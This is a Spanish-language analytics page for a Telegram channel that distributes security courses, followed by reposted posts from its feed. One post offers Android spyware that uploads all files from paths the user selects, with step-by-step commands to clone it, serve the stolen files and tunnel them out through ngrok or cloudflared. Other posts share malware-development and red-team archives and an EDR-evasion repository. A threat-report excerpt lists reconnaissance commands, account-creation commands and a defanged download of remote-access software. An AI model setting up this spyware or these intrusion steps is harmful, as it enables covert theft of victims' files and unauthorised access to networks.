es
Feedback
All Security Engineering Courses

All Security Engineering Courses

Ir al canal en Telegram

This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!

Mostrar más

📈 Análisis del canal de Telegram All Security Engineering Courses

El canal All Security Engineering Courses (@allsecurityengineeringcourses) en el segmento lingüístico de Inglés es un actor destacado. Actualmente la comunidad reúne a 19 216 suscriptores, ocupando la posición 6 651 en la categoría Tecnologías y Aplicaciones y el puesto 34 061 en la región Rusia.

📊 Métricas de audiencia y dinámica

Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 19 216 suscriptores.

Según los últimos datos del 19 septiembre, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 99, y en las últimas 24 horas de 0, conservando un alto alcance.

  • Estado de verificación: No verificado
  • Tasa de interacción (ER): El promedio de interacción de la audiencia es 16.35%. Durante las primeras 24 horas tras publicar, el contenido suele obtener N/A% de reacciones respecto al total de suscriptores.
  • Alcance de las publicaciones: Cada publicación recibe en promedio 0 visualizaciones. En el primer día suele acumular 0 visualizaciones.
  • Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 0.
  • Intereses temáticos: El contenido se centra en temas clave como git, strace, github, linux, docker.

📝 Descripción y política de contenido

El autor describe el recurso como un espacio para expresar opiniones subjetivas:
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...

Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 20 septiembre, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.

19 216
Suscriptores
Sin datos24 horas
+287 días
+9930 días
Archivo de publicaciones
@WickHelps-ntroduction Windows Malware Development.rar1282.35 MB

Repost from N/a
Simple Android spyware that uploads all files from user selected paths. pkg update && pkg upgrade -y pkg install git pv unzip
Simple Android spyware that uploads all files from user selected paths.
pkg update && pkg upgrade -y
pkg install git pv unzip -y
git clone http://github.com/7wp81x/Spim3
cd Spim3/
bash spim3.sh

Example usage:

- open new session
cd Files/
php -S 127.0.0.1:8000 > /dev/null 2>&1 &

- Tunnel using cloudflared
cloudflared tunnel --url 127.0.0.1:8080

- Tunnel using ngrok
ngrok http 8080

- on main session:

bash spim3.sh

- Enter the url from ngrok/cloudflare.
- Enter paths, if done then Enter done.
- Compile /sdcard/Spim3/decompiled Using apktool_M
Termux tools are for educational use only. For more information about this tool, visit the GitHub link.

Repost from N/a
Antisyphon: Offensive Development w/ Greg Hatcher & John Stigerwalt
Antisyphon: Offensive Development w/ Greg Hatcher & John Stigerwalt

HackTricks - AWS Red Team Expert (ARTE).part01.rar1996.80 MB

Offensive Development w Greg Hatcher & John Stigerwalt.rar3250.61 MB

https://xakep.ru/2011/12/06/57950/ SQLMap - SQL Injections are easy

https://trivy.dev/v0.17.2/ A Simple and Comprehensive Vulnerability Scanner for Containers and other Artifacts, Suitable for CI.

US companies letting go of US employees!
US companies letting go of US employees!

So that was a lie
So that was a lie

This repo contains information about EDRs that can be useful during red team exercise. https://github.com/Mr-Un1k0d3r/EDRs/ #статьи_ссылки_scripts

After establishing an initial connection, SCATTERED SPIDER executed the ping command against several domains within and outside of the target organization, likely to identify their level of access and visibility within the network. The adversary then ran several variations of the nltest command to identify domain controllers (DCs) of interest and the wmic command to identify programs currently installed on the host. Finally, the adversary established persistence by creating a new user on the host and attempting to download FleetDeck remote access software. nltest /dclist:<domain> nltest /domain_trusts wmic product get name, version net user [Redacted-Username] [Redacted-Password] curl -L hxxps://agent.fleetdeck[.]io/M9zydGyGHrUXkhZeB9mj4?win -o chrome.exe